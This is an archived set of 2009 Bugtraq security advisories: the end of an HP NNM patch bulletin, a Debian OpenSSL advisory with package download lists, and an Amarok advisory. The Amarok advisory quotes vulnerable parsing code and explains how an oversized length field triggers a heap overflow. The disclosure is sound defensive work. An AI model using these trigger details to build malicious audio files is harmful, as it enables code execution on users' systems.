==============================================Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

RESOLUTION

HP has made patches available to resolve the vulnerabilities.

The patches are available from http://support.openview.hp.com/selfsolve/patches 

Note: The patches are not available from the HP IT Resource Center (ITRC). 

OV NNM v7.53 

Operating_System - HP-UX (IA)
Resolved in Patch - PHSS_38148 or subsequent
 
Operating_System - HP-UX (PA)
Resolved in Patch - PHSS_38147 or subsequent
 
Operating_System - Linux RedHatAS2.1 
Resolved in Patch - LXOV_00085 or subsequent
 
Operating_System - Linux RedHat4AS-x86_64 
Resolved in Patch - LXOV_00086 or subsequent
 
Operating_System - Solaris
Resolved in Patch - PSOV_03514 or subsequent
 
Operating_System - Windows
Resolved in Patch - NNM_01192 or subsequent
 


OV NNM v7.51 

Upgrade to NNM v7.53 and install the patches listed above. Patch bundles for upgrading from NNM v7.51 to NNM v5.53 are available here: ftp://nnm_753:update@hprc.external.hp.com/ 


OV NNM v7.01 

Operating_System - HP-UX (PA)
Resolved in Patch - PHSS_38761 or subsequent
 
Operating_System - Solaris
Resolved in Patch - PSOV_03516 or subsequent
 
Operating_System - Windows
Resolved in Patch - NNM_01194 or subsequent
 


MANUAL ACTIONS: Yes - NonUpdate 
Install the patches listed in the Resolution 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa 

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

For HP-UX OV NNM 7.51 and 7.53 
HP-UX B.11.31 
HP-UX B.11.23 (IA) 
HP-UX B.11.23 (PA) 
HP-UX B.11.11 
============OVNNMgr.OVNNM-RUN,fr=B.07.50.00 
action: install the patches listed in the Resolution 
URL: http://support.openview.hp.com/selfsolve/patches 

For HP-UX OV NNM 7.01 
HP-UX B.11.11 
============OVNNMgr.OVNNM-RUN,fr=B.07.01.00 
action: install the patches listed in the Resolution 
URL: http://support.openview.hp.com/selfsolve/patches 

END AFFECTED VERSIONS (for HP-UX)

HISTORY 
Version:1 (rev.1) - 12 January 2009 Initial release 

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.


To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

�Copyright 2009 Hewlett-Packard Development Company, L.P. 

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSWtNdOAfOvwtKn1ZEQJ/ZwCg5FJvfi0deyGLvO+15mGZY27iCjUAoK7t
qG7MzE/ycPP5ERNsWLxYiBlN
�jd
-----END PGP SIGNATURE-----

From - Mon Jan 12 14:21:46 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005894
X-Mozilla-Status: 0001
X-Mozilla-Status2: 10000000
Return-Path: <bugtraq-return-39125-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3B29DEC797
for <lists@securityspace.com>; Mon, 12 Jan 2009 14:13:32 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 4D3752374CC; Mon, 12 Jan 2009 08:51:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14425 invoked from network); 11 Jan 2009 17:24:51 -0000
X-RZG-CLASS-ID: mo00
X-RZG-AUTH: :OGckYVKpa/RorD1n4vbkpyN1OrydUB3M3D078vRVBTvDAWjAyZyLqHWpqw=Message-ID: <496A30CD.8060409@trapkit.de>
Date: Sun, 11 Jan 2009 18:47:57 +0100
From: Tobias Klein <tk@trapkit.de>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: [TKADV2009-002] Amarok Integer Overflow and Unchecked Allocation
 Vulnerabilities
Content-Type: multipart/mixed;
 boundary="------------020504080803080507050900"
Status:   

This is a multi-part message in MIME format.
--------------020504080803080507050900
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 7bit

Please find attached a detailed advisory of the vulnerabilities.

Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2009-002.txt

--------------020504080803080507050900
Content-Type: text/plain;
 name="TKADV2009-002.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="TKADV2009-002.txt"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory:               Amarok Integer Overflow and Unchecked Allocation 
                        Vulnerabilities
Advisory ID:            TKADV2009-002
Revision:               1.0              
Release Date:           2009/01/11 
Last Modified:          2009/01/11
Date Reported:          2009/01/05
Author:                 Tobias Klein (tk at trapkit.de)
Affected Software:      Amarok < version 2.0.1.1
Remotely Exploitable:   Yes
Locally Exploitable:    No 
Vendor URL:             http://amarok.kde.org/ 
Vendor Status:          Vendor has released an updated version
Patch development time: 7 days


=====================Vulnerability Details: 
=====================
Amarok contains several integer overflows and unchecked allocation 
vulnerabilities while parsing malformed Audible digital audio files. 
The vulnerabilities may be exploited by a (remote) attacker to execute 
arbitrary code in the context of Amarok.


=================Technical Details:
=================
Source code file from Amarok 2.0: 
  amarok-2.0\src\metadata\audible\audibletag.cpp

[...]
140 bool Audible::Tag::readTag( FILE *fp, char **name, char **value)
141 {
142        quint32 nlen;
143 [1]    if ( fread(&nlen, sizeof(nlen), 1, fp) != 1 )
144            return false;
145 
146        nlen = ntohl(nlen);
147        //fprintf(stderr, "tagname len=%x\n", (unsigned)nlen);
148 [2]    *name = new char[nlen+1];
149 [4]    (*name)[nlen] = '\0';
150 
151        quint32 vlen;
152 [5]    if ( fread(&vlen, sizeof(vlen), 1, fp) != 1 )
153        {
154            delete [] *name;
155            *name = 0;
156            return false;
157        }
158 
159        vlen = ntohl(vlen);
160        //fprintf(stderr, "tag len=%x\n", (unsigned)vlen);
161 
162 [3]    if ( fread(*name, nlen, 1, fp) != 1 )
163        {
164            delete [] *name;
165            *name = 0;
166            return false;
167        }
168 
169 [6]    *value = new char[vlen+1];
170 [8]    (*value)[vlen] = '\0';
171 
172 [7]    if ( fread(*value, vlen, 1, fp) != 1 )
173        {
174            delete [] *value;
175            *value = 0;
176            return false;
177        }
178 
[...]

Description of integer overflow #1 that leads to a heap buffer overflow:

[1] A user defined value is extracted from the media file and stored in 
    the unsigned int variable "nlen".
[2] In this line a heap buffer of "nlen+1" bytes is allocated. By supplying
    a value of 0xffffffff for "nlen" an integer overflow happens resulting 
    in the allocation of a very small heap buffer. 
[3] The user controlled value of "nlen" is used as a length specifier to 
    copy user controlled data from the media file into the previously 
    allocated (small) heap buffer pointed to by "name". As "nlen" has a 
    very large value (0xffffffff) the heap buffer is overflowed with user 
    controlled data of the media file. The exact number of bytes that get 
    written beyond the heap buffer can be controlled by the length of the 
    media file. This leads to a controllable heap overflow vulnerability.  

Description of the unchecked allocation vulnerability #1 that may result in
an exploitable memory corruption condition:

[2] + [4] This code fails to check for a NULL pointer returned from a new 
          [] statement. The resulting pointer is then dereferenced by the 
          user controlled value of "nlen" and a 8-bit value of 0x00 is 
          assigned to the dereferenced location. This issue can be 
          exploited to overwrite an arbitrary memory location with the 1-
          byte value 0x00. A malicious party may exploit this issue to 
          execute arbitrary code by overwriting a sensitive memory location
          (such as a buffer length or boolean variable).

Description of integer overflow #2 that leads to a heap buffer overflow:

[5] A user defined value is extracted from the media file and stored in 
    the unsigned int variable "vlen".
[6] In this line a heap buffer of "vlen+1" bytes is allocated. By supplying
    a value of 0xffffffff for "vlen" an integer overflow happens resulting 
    in the allocation of a very small heap buffer. 
[7] The user controlled value of "vlen" is used as a length specifier to 
    copy user controlled data from the media file into the previously 
    allocated (small) heap buffer pointed to by "value". As "vlen" has a 
    very large value (0xffffffff) the heap buffer is overflowed with user 
    controlled data of the media file. The exact number of bytes that get 
    written beyond the heap buffer can be controlled by the length of the 
    media file. This leads to a controllable heap overflow vulnerability. 

Description of the unchecked allocation vulnerability #2 that may result in
an exploitable memory corruption condition:

[6] + [8] This code fails to check for a NULL pointer returned from a new 
          [] statement. The resulting pointer is then dereferenced by the 
          user controlled value of "vlen" and a 8-bit value of 0x00 is 
          assigned to the dereferenced location. This issue can be 
          exploited to overwrite an arbitrary memory location with the 1-
          byte value 0x00. A malicious party may exploit this issue to 
          execute arbitrary code by overwriting a sensitive memory location
          (such as a buffer length or boolean variable).

In Amarok versions < 2.0 the source code of the vulnerable function is 
slightly different but suffers from the same vulnerabilities.


========Solution: 
========
  Upgrade to Amarok version 2.0.1.1


=======History: 
=======
  2009/01/05 - KDE Security notified using security@kde.org (no response)
  2009/01/08 - KDE Security notified a 2nd time 
  2009/01/09 - Response of the Amarok maintainers. Patch developed.
  2009/01/11 - New Amarok version released and public disclosure of 
               vulnerability details by Amarok maintainers
  2009/01/11 - Release date of this security advisory


=======Credits: 
=======
  Vulnerability found and advisory written by Tobias Klein.


==========References: 
==========
 [1] http://amarok.kde.org/de/node/600
 [2] http://www.trapkit.de/advisories/TKADV2009-002.txt


=======Changes: 
=======
  Revision 0.1 - Initial draft release to the vendor
  Revision 1.0 - Public release


==========Disclaimer:
==========
The information within this advisory may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this
information is at the user's own risk.


=================PGP Signature Key: 
=================
  http://www.trapkit.de/advisories/tk-advisories-signature-key.asc

  
Copyright 2009 Tobias Klein. All rights reserved.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG

iD8DBQFJai8ikXxgcAIbhEERAra6AKDtjwwMGj9l0epKrPTfiFzN5NdNnACeIxHL
Ga1AKITh9usybkQgwJTyNoA=X9Mk
-----END PGP SIGNATURE-----

--------------020504080803080507050900--

From - Mon Jan 12 15:32:16 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005896
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39139-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id C0DD9ECE0D
for <lists@securityspace.com>; Mon, 12 Jan 2009 15:23:36 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 31BE2143972; Mon, 12 Jan 2009 13:19:31 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 1881 invoked from network); 12 Jan 2009 19:40:27 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <fw@deneb.enyo.de>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR SBL_XBL_SPAMHAUS=ERR NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client!2.9.189.167> <helo=mail.enyo.de> <from=fw@deneb.enyo.de> <to�bian-security-announce@lists.debian.org>, rate: -4.6
From: Florian Weimer <fw@deneb.enyo.de>
Date: Mon, 12 Jan 2009 21:03:29 +0100
Message-ID: <87y6xgz3zi.fsf@mid.deneb.enyo.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-9.08 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5, PHONENUMBER=1.5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1701-1] New OpenSSL packages fix cryptographic weakness
Priority: urgent
Resent-Message-ID: <Xg5qr-G72KK.A.DoD.mI6aJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Mon, 12 Jan 2009 20:03:50 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1701-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
January 12, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : openssl, openssl097
Vulnerability  : interpretation conflict
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-5077
Debian Bug     : 511196

It was discovered that OpenSSL does not properly verify DSA signatures
on X.509 certificates due to an API misuse, potentially leading to the
acceptance of incorrect X.509 certificates as genuine (CVE-2008-5077).

For the stable distribution (etch), this problem has been fixed in
version 0.9.8c-4etch4 of the openssl package, and version
0.9.7k-3.1etch2 of the openssl097 package.

For the unstable distribution (sid), this problem has been fixed in
version 0.9.8g-15.

The testing distribution (lenny) will be fixed soon.

We recommend that you upgrade your OpenSSL packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k-3.1etch2.dsc
    Size/MD5 checksum:     1069 fb69818a28ead5b3026dcafc1f5e92d5
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c.orig.tar.gz
    Size/MD5 checksum:  3313857 78454bec556bcb4c45129428a766c886
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4.diff.gz
    Size/MD5 checksum:    56230 ad913155fe55d659741976a1be02ee48
  http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k.orig.tar.gz
    Size/MD5 checksum:  3292692 be6bba1d67b26eabb48cf1774925416f
  http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k-3.1etch2.diff.gz
    Size/MD5 checksum:    34518 845a986c8a5170953c1e88c2d9965176
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4.dsc
    Size/MD5 checksum:     1107 fd0b477d237c473e3f1491e8821b155d

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_alpha.deb
    Size/MD5 checksum:  2561904 e0499757c84819b0cb4919de45e733c4
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_alpha.deb
    Size/MD5 checksum:  3822008 a63ea4834f1be21cf7dacd7a60817914
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_alpha.deb
    Size/MD5 checksum:  2209796 1d008a2d9fcb466c0e1393fd6cf1dced
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_alpha.deb
    Size/MD5 checksum:  4558410 af0dcd956ae91457c01c5152bea8c775
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_alpha.deb
    Size/MD5 checksum:  1026098 957ee2ef34a7aa24c41903eea6d1db51
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_alpha.deb
    Size/MD5 checksum:  2621108 d42a2d70f27723a8dc9aab1dfb83ad10
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_alpha.udeb
    Size/MD5 checksum:   677162 039dd8968e77f09312fc4e502601b6fe

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_amd64.deb
    Size/MD5 checksum:   891116 0d771317a58430e6ecea1e38e6889ef4
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_amd64.udeb
    Size/MD5 checksum:   580208 f08c5d2e4649dd9f077b440d3cd35963
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_amd64.deb
    Size/MD5 checksum:  1655264 ec946f04aa2fae3a001be8c7ae330839
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_amd64.deb
    Size/MD5 checksum:   753788 e5521b844646e69b1b8f2daa872b83b8
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_amd64.deb
    Size/MD5 checksum:   992378 417077b8de5a56b9dad0667f2ab5b6e2
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_amd64.deb
    Size/MD5 checksum:  2178820 effca1afcd65d7e418f3cb75dd875b1d
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_amd64.deb
    Size/MD5 checksum:  1326428 670a34f7c39343a7939ba43c4658821c

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_hppa.deb
    Size/MD5 checksum:  1586088 66b4b504f0e67fc74c9a98e1f6e8cbac
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_hppa.deb
    Size/MD5 checksum:  1274896 2dc2191758d272e05461f574bd50031b
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_hppa.deb
    Size/MD5 checksum:  1030994 cfe12740f5f0492a05646851dc042ba8
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_hppa.deb
    Size/MD5 checksum:   945354 e001f9834b3a7fbfd69963118afc7922
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_hppa.deb
    Size/MD5 checksum:   793836 489e8472b5b300e2627cd25be399f42f
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_hppa.udeb
    Size/MD5 checksum:   631120 18fb83375c2b5a6689703c1219ad4f65
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_hppa.deb
    Size/MD5 checksum:  2248436 0c045e8c6dcc0ee3e89d1808b3818eed

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_i386.deb
    Size/MD5 checksum:  2285788 a1b0456725a0ca95457c74672a235097
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_i386.deb
    Size/MD5 checksum:  1015498 04dd57145bc4d8fbd728bba329e7dc72
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_i386.udeb
    Size/MD5 checksum:   554698 e30b6a20efd74af8bbd5bfb5e9241113
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_i386.deb
    Size/MD5 checksum:  2721068 abec8c0872781f622454d14ae4e39bad
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_i386.deb
    Size/MD5 checksum:  4646314 e0a3f1a4d622f7a6a8886bb1bdf56bbe
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_i386.deb
    Size/MD5 checksum:  2094162 fe95acfa9d541760bbb0c0ed86982bcb
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_i386.deb
    Size/MD5 checksum:  5582804 aa194f9d43a3890d810e81086b4ee473

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_ia64.deb
    Size/MD5 checksum:  1263564 be2a79505ff0ae08e19c8ceeafdf7a08
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_ia64.deb
    Size/MD5 checksum:  2593624 3a198fb3a4a51e81340d2a1175766c91
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_ia64.deb
    Size/MD5 checksum:  1569658 4dbd1a9c3f4d0fe2b8906a8555e26105
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_ia64.deb
    Size/MD5 checksum:  1071264 45a62ed67f0ad2168cab559b45aa7de6
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_ia64.deb
    Size/MD5 checksum:  1192358 c28adf2245854e3b368d7f88590fc730
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_ia64.udeb
    Size/MD5 checksum:   801742 ce515f87f93a6364b22f94c5840a4729
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_ia64.deb
    Size/MD5 checksum:  1010004 4222d05c1eb0ce929c68f7c8cc11ecd3

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_mips.deb
    Size/MD5 checksum:  1693440 29a8f61c5cfb619d20235fb91cf9ff3b
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_mips.udeb
    Size/MD5 checksum:   580128 fc3af402963b6fa4d24b89a4afcd8bc3
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_mips.deb
    Size/MD5 checksum:   876210 f87b4773e3c70539302f5af3b51800b9
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_mips.deb
    Size/MD5 checksum:   993434 02a232c80759b81c67df2e6e6a2cca26
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_mips.deb
    Size/MD5 checksum:  2258938 be0d32157248efd6f87f450630ce22ef

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_mipsel.deb
    Size/MD5 checksum:   992856 85a14404d0cae1d5100721d014d5ee29
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_mipsel.deb
    Size/MD5 checksum:  2255990 1bd0adee660543138600882fc2e42d81
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_mipsel.deb
    Size/MD5 checksum:  1649560 22c06f600378978e094230c172db8ca4
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_mipsel.deb
    Size/MD5 checksum:   860700 bc11dc6212a74c8ca4bf6d314f929dff
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_mipsel.deb
    Size/MD5 checksum:   718942 4ad8442b8812dfe2fd4fcbe06591c3c2
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_mipsel.deb
    Size/MD5 checksum:  1317060 1d35b7e67204b5b31ab16c2514c69e02
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_mipsel.udeb
    Size/MD5 checksum:   566226 1300061de87860cdf5ecfaeb26839c5f

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_powerpc.deb
    Size/MD5 checksum:   743386 7e189844da3112f289ff8f96458b7d6e
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_powerpc.deb
    Size/MD5 checksum:  1002204 24f2f0ec4aa965ff9057f7055322b70e
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_powerpc.deb
    Size/MD5 checksum:  1728492 6074f055c8257f19962341a29c0dc1c2
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_powerpc.deb
    Size/MD5 checksum:  1382114 41b6f5900e7a6361625a7fde3329d389
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_powerpc.deb
    Size/MD5 checksum:   895634 495901098cb75b870810b6abcb82c187
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_powerpc.deb
    Size/MD5 checksum:  2210874 5b27bc4f2f2fc1c15957242a383b9921
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_powerpc.udeb
    Size/MD5 checksum:   585332 5cb7f5d282dd56d2825253006fc4ac29

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_s390.deb
    Size/MD5 checksum:  1317066 0e843e8f68a84557d8f9306c61609283
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_s390.deb
    Size/MD5 checksum:  2193894 d3d5eeb042d82e5b383177e08136b3cc
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_s390.deb
    Size/MD5 checksum:   951570 621f50aae93efdd5c31a94071e93eaa9
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_s390.deb
    Size/MD5 checksum:  1633204 4e6a635c45caa90a0f28f58286b5b2bf
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_s390.deb
    Size/MD5 checksum:  1014480 639c707aed6efc331f1c3b6b14322ee0
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_s390.deb
    Size/MD5 checksum:   794236 3bc1224270f26fb7b85eae99b18a1e97
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_s390.udeb
    Size/MD5 checksum:   643020 41a09437ea5130fe0daed09edd4e6423

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_sparc.udeb
    Size/MD5 checksum:   539054 4807d481d7878ea7032d7aa9747e95e0
